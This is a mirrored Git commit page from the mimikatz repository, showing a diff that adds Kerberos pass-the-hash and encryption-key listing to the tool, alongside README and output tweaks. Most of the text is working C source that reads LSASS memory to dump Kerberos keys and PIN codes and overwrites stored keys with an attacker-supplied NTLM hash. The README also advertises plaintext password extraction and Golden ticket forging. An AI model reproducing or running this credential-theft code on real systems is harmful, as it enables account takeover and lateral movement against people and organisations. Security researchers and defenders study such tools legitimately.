RepoMirrors/mimikatz
1
0
Fork 0
mirror of https://github.com/gentilkiwi/mimikatz synced 2025-02-16 09:26:55 +00:00
Code Issues Packages Projects Releases Wiki Activity

Kerberos 'Pass-The-Hash', eKeys

Browse Source 
MSV 'Pass-The-Hash' improvements
Better Crypto output
README update
This commit is contained in:
Benjamin DELPY 2014-04-30 23:01:08 +02:00
parent 4e6f3e1758
commit 5571133a4b
10 changed files with 278 additions and 84 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
README.md
View File

@ -2,7 +2,7 @@
**`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security.
It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** also can perform pass-the-hash, pass-the-ticket or build _Golden tickets_.
It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.
```
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
@ -36,9 +36,9 @@ SID : S-1-5-21-1982681256-1210654043-1600862990-1000
* Password : waza1234/
...
```
But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations (in French, _yes_) on http://blog.gentilkiwi.com.
But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, _yes_).
If you don't want to build it, binaries are availables on http://blog.gentilkiwi.com/mimikatz
If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases
## Quick usage
@ -75,7 +75,7 @@ crypto::keys /export
crypto::keys /machine /export
```
### vault && lsadump
### vault & lsadump
```
vault::cred
vault::list
@ -120,4 +120,4 @@ CC BY 3.0 FR licence - http://creativecommons.org/licenses/by/3.0/fr/
## Author
Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
This is a **personal** developpement, please respect its philosophy and don't use it for bad things!
This is a **personal** developpement, please respect its philosophy and don't use it for bad things!

7
mimikatz/modules/kuhl_m_crypto.c
View File

@ -213,7 +213,7 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
kull_m_string_args_byName(argc, argv, L"store", &szStore, L"My");
kprintf(L" * System Store : \'%s\' (0x%08x)\n"
L" * Store : \'%s\'\n",
L" * Store : \'%s\'\n\n",
szSystemStore, dwSystemStore,
szStore);
@ -230,7 +230,7 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
{
if(CertGetNameString(pCertContext, nameSrc[j], 0, NULL, certName, dwSizeNeeded) == dwSizeNeeded)
{
kprintf(L"\n%2u. %s\n", i, certName);
kprintf(L"%2u. %s\n", i, certName);
dwSizeNeeded = 0;
if(CertGetCertificateContextProperty(pCertContext, CERT_KEY_PROV_INFO_PROP_ID, NULL, &dwSizeNeeded))
@ -273,6 +273,8 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
} else PRINT_ERROR_AUTO(L"CertGetCertificateContextProperty");
}
LocalFree(pBuffer);
if(!export)
kprintf(L"\n");
}
if(export)
@ -554,6 +556,7 @@ void kuhl_m_crypto_exportCert(PCCERT_CONTEXT pCertificate, BOOL havePrivateKey,
else
PRINT_ERROR_AUTO(L"kuhl_m_crypto_generateFileName");
}
kprintf(L"\n");
}
wchar_t * kuhl_m_crypto_generateFileName(const wchar_t * term0, const wchar_t * term1, const DWORD index, const wchar_t * name, const wchar_t * ext)

18
mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
View File

@ -20,6 +20,7 @@ const KUHL_M_C kuhl_m_c_sekurlsa[] = {
{kuhl_m_sekurlsa_msv_pth, L"pth", L"Pass-the-hash"},
{kuhl_m_sekurlsa_kerberos_tickets, L"tickets", L"List Kerberos tickets"},
{kuhl_m_sekurlsa_kerberos_keys, L"ekeys", L"List Kerberos Encryption Keys"},
{kuhl_m_sekurlsa_dpapi, L"dpapi", L"List Cached MasterKeys"},
{kuhl_m_sekurlsa_credman, L"credman", L"List Credentials Manager"},
};
@ -424,6 +425,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
PKERB_HASHPASSWORD_GENERIC pHashPassword;
UNICODE_STRING buffer;
PVOID base;
DWORD type, i;
@ -478,6 +481,21 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
}
}
}
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
{
pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
kprintf(L"\t %4i : ", pHashPassword->Type);
buffer.Buffer = (PWSTR) pHashPassword->Checksump;
buffer.Length = buffer.MaximumLength = (USHORT) ((pHashPassword->Size) ? pHashPassword->Size : LM_NTLM_HASH_LENGTH); // will not use CDLocateCSystem, sorry!
if(kull_m_string_getUnicodeString(&buffer, cLsass.hLsassMem))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
(*lsassLocalHelper->pLsaUnprotectMemory)(buffer.Buffer, buffer.MaximumLength);
kull_m_string_wprintf_hex(buffer.Buffer, buffer.Length, 0);
LocalFree(buffer.Buffer);
}
kprintf(L"\n");
}
else
{
if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)

1
mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h
View File

@ -34,6 +34,7 @@
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
#define KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST 0x00200000
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS 0x00400000
#define KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE 0x00800000

181
mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
View File

@ -55,6 +55,10 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, Ticket),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, TicketKvno),
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_51),
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, pKeyList),
sizeof(KIWI_KERBEROS_KEYS_LIST_5),
FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
sizeof(KERB_HASHPASSWORD_5),
},
{
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@ -83,6 +87,10 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, Ticket),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, TicketKvno),
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_52),
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pKeyList),
sizeof(KIWI_KERBEROS_KEYS_LIST_5),
FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
sizeof(KERB_HASHPASSWORD_5),
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@ -111,6 +119,10 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Ticket),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketKvno),
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_6),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pKeyList),
sizeof(KIWI_KERBEROS_KEYS_LIST_6),
FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
sizeof(KERB_HASHPASSWORD_6),
},
};
@ -124,29 +136,157 @@ NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[])
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, NULL);
KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_passwords, NULL};
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, &data);
}
NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[])
{
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_tickets, &argc);
KIWI_KERBEROS_ENUM_DATA_TICKET ticketData = {argc, FALSE};
KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_tickets, &ticketData};
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_generic, &data);
return STATUS_SUCCESS;
}
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
NTSTATUS kuhl_m_sekurlsa_kerberos_keys(int argc, wchar_t * argv[])
{
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, pOptionalData);
KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_keys, NULL};
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_generic, &data);
return STATUS_SUCCESS;
}
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_generic(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
{
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, (PKIWI_KERBEROS_ENUM_DATA) pOptionalData);
return TRUE;
}
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
{
UNICODE_STRING pinCode;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {&pinCode, &hLocalMemory}, aLsassMemory = {*(PUNICODE_STRING *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetPin), pData->cLsass->hLsassMem};
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0);
if(aLsassMemory.address)
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0));
}
const wchar_t * KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[] = {L"Ticket Granting Service", L"Client Ticket ?", L"Ticket Granting Ticket",};
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
{
PKIWI_KERBEROS_ENUM_DATA_TICKET ticketData = (PKIWI_KERBEROS_ENUM_DATA_TICKET) pOptionalData;
DWORD i;
kuhl_m_sekurlsa_printinfos_logonData(pData);
for(i = 0; i < 3; i++)
{
kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
kuhl_m_sekurlsa_kerberos_enum_tickets(pData, i, (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetTickets[i], ticketData->isTicketExport);
kprintf(L"\n");
}
}
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
{
DWORD i, nbHash;
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory};
if(RemoteLocalKerbSession.address = *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
{
kuhl_m_sekurlsa_printinfos_logonData(pData);
kprintf(L"\n\tKey List @ %p\n", RemoteLocalKerbSession.address);
if(aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
{
if(kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
{
if(nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
{
RemoteLocalKerbSession.address = (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
i = nbHash * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
if(aLocalHashMemory.address = LocalAlloc(LPTR, i))
{
if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
for(i = 0; i < nbHash; i++)
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0));
LocalFree(aLocalHashMemory.address);
}
}
}
LocalFree(aLocalKeyMemory.address);
}
}
}
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
{
PMSV1_0_PTH_DATA pthData = (PMSV1_0_PTH_DATA) pOptionalData;
DWORD i, nbHash;
BYTE ntlmHash[LM_NTLM_HASH_LENGTH];
UNICODE_STRING nullPasswd = {0, 0, NULL};
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}, aLocalNTLMMemory = {ntlmHash, Localkerbsession.hMemory}, aLocalPasswdMemory = {&nullPasswd, Localkerbsession.hMemory}, aRemotePasswdMemory = {(PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory};
PKERB_HASHPASSWORD_GENERIC pHash;
if(RemoteLocalKerbSession.address = *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
{
if(aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
{
if(kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
{
if(nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
{
RemoteLocalKerbSession.address = (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
i = nbHash * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
if(aLocalHashMemory.address = LocalAlloc(LPTR, i))
{
if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
{
kprintf(L"Data copy Kerberos @ %p (%u hash) :", RemoteLocalKerbSession.address, nbHash);
for(i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
{
kprintf(L" ");
pHash = (PKERB_HASHPASSWORD_GENERIC) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric);
RemoteLocalKerbSession.address = pHash->Checksump;
RtlCopyMemory(aLocalNTLMMemory.address, pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
if(pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA)
(*pData->lsassLocalHelper->pLsaProtectMemory)(aLocalNTLMMemory.address, LM_NTLM_HASH_LENGTH);
if(pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, pHash->Size ? (min(pHash->Size, LM_NTLM_HASH_LENGTH)) : LM_NTLM_HASH_LENGTH)) // ok not fair-play with AES-* and old CRC =)
kprintf(L"%u", i+1);
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}
if(pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
{
kprintf(L" ");
if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, sizeof(UNICODE_STRING)))
kprintf(L"OK!", aRemotePasswdMemory.address);
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}
}
LocalFree(aLocalHashMemory.address);
}
}
}
LocalFree(aLocalKeyMemory.address);
}
}
}
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
{
PMSV1_0_PTH_DATA pthData = (PMSV1_0_PTH_DATA) pOptionalData;
KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_pth, pthData};
if(RtlEqualLuid(pData->LogonId, pthData->LogonId))
{
kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, &data);
return FALSE;
}
else return TRUE;
}
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKIWI_KERBEROS_ENUM_DATA pEnumData)
{
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
UNICODE_STRING pinCode;
DWORD i;
if(kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex))
{
aLsassMemory.address = KerbLogonSessionListOrTable;
@ -160,36 +300,13 @@ void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGO
if(aLocalMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize))
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structSize))
{
if(pOptionalData) // ticket mode
{
kuhl_m_sekurlsa_printinfos_logonData(pData);
for(i = 0; i < 3; i++)
{
kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
kuhl_m_sekurlsa_kerberos_enum_tickets(pData, i, (PBYTE) aLsassMemory.address + kerbHelper[KerbOffsetIndex].offsetTickets[i], *(int *) pOptionalData);
kprintf(L"\n");
}
}
else // password mode
{
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0);
if(aLsassMemory.address = (*(PUNICODE_STRING *) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetPin)))
{
aLocalMemory.address = &pinCode;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0));
}
}
}
pEnumData->callback(pData, aLocalMemory, aLsassMemory, pEnumData->optionalData);
LocalFree(aLocalMemory.address);
}
}
} else kprintf(L"KO");
}
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile)
{
PVOID pStruct, pRef = tickets;

53
mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h
View File

@ -6,18 +6,34 @@
#pragma once
#include "../kuhl_m_sekurlsa.h"
#include "../../kerberos/kuhl_m_kerberos_ticket.h"
#include "../modules/kull_m_crypto_system.h"
#include "../modules/kull_m_file.h"
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package;
NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_sekurlsa_kerberos_keys(int argc, wchar_t * argv[]);
typedef void (CALLBACK * PKUHL_M_SEKURLSA_KERBEROS_CRED_CALLBACK) (IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
typedef struct _KIWI_KERBEROS_ENUM_DATA {
PKUHL_M_SEKURLSA_KERBEROS_CRED_CALLBACK callback;
PVOID optionalData;
} KIWI_KERBEROS_ENUM_DATA, *PKIWI_KERBEROS_ENUM_DATA;
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_generic(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKIWI_KERBEROS_ENUM_DATA pEnumData);
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile);
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData);
wchar_t * kuhl_m_sekurlsa_kerberos_generateFileName(PLUID LogonId, const DWORD grp, const DWORD index, PKIWI_KERBEROS_TICKET ticket, LPCWSTR ext);
PKIWI_KERBEROS_TICKET kuhl_m_sekurlsa_kerberos_createTicket(PBYTE pTicket, PKULL_M_MEMORY_HANDLE hLSASS);
@ -51,6 +67,10 @@ typedef struct _KERB_INFOS {
LONG offsetTicket;
LONG offsetTicketKvno;
SIZE_T structTicketSize;
LONG offsetKeyList;
SIZE_T structKeyListSize;
LONG offsetHashGeneric;
SIZE_T structKeyPasswordHashSize;
} KERB_INFOS, *PKERB_INFOS;
typedef struct _KIWI_KERBEROS_LOGON_SESSION_51 {
@ -83,7 +103,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION_51 {
PVOID unk20;
PVOID unk21;
PVOID unk22;
PVOID unk23;
PVOID pKeyList;
PVOID unk24;
LIST_ENTRY Tickets_1;
LIST_ENTRY Tickets_2;
@ -120,7 +140,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION {
PVOID unk19;
PVOID unk20;
PVOID unk21;
PVOID unk22;
PVOID pKeyList;
PVOID unk23;
LIST_ENTRY Tickets_1;
FILETIME unk24;
@ -231,4 +251,27 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_6 {
ULONG TicketEncType;
ULONG TicketKvno;
KIWI_KERBEROS_BUFFER Ticket;
} KIWI_KERBEROS_INTERNAL_TICKET_6, *PKIWI_KERBEROS_INTERNAL_TICKET_6;
} KIWI_KERBEROS_INTERNAL_TICKET_6, *PKIWI_KERBEROS_INTERNAL_TICKET_6;
typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {
DWORD unk0; // dword_1233EC8 dd 4
DWORD cbItem; // debug048:01233ECC dd 5
PVOID unk1;
PVOID unk2;
//KERB_HASHPASSWORD_5 KeysEntries[ANYSIZE_ARRAY];
} KIWI_KERBEROS_KEYS_LIST_5, *PKIWI_KERBEROS_KEYS_LIST_5;
typedef struct _KIWI_KERBEROS_KEYS_LIST_6 {
DWORD unk0; // dword_1233EC8 dd 4
DWORD cbItem; // debug048:01233ECC dd 5
PVOID unk1;
PVOID unk2;
PVOID unk3;
PVOID unk4;
//KERB_HASHPASSWORD_6 KeysEntries[ANYSIZE_ARRAY];
} KIWI_KERBEROS_KEYS_LIST_6, *PKIWI_KERBEROS_KEYS_LIST_6;
typedef struct _KIWI_KERBEROS_ENUM_DATA_TICKET {
BOOL isTicketExport;
BOOL isFullTicket;
} KIWI_KERBEROS_ENUM_DATA_TICKET, *PKIWI_KERBEROS_ENUM_DATA_TICKET;

69
mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
View File

@ -19,22 +19,19 @@ NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[])
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
MSV1_0_STD_DATA stdData = {pData->LogonId};
kuhl_m_sekurlsa_msv_enum_cred(pData->cLsass, pData->pCredentials, kuhl_m_sekurlsa_msv_enum_cred_callback_std, &stdData);
kuhl_m_sekurlsa_msv_enum_cred(pData->cLsass, pData->pCredentials, kuhl_m_sekurlsa_msv_enum_cred_callback_std, pData->LogonId);
}
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
{
DWORD flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL;
PMSV1_0_STD_DATA stdData = (PMSV1_0_STD_DATA) pOptionalData;
kprintf(L"\n\t [%08x] %Z", AuthenticationPackageId, &pCredentials->Primary);
if(RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
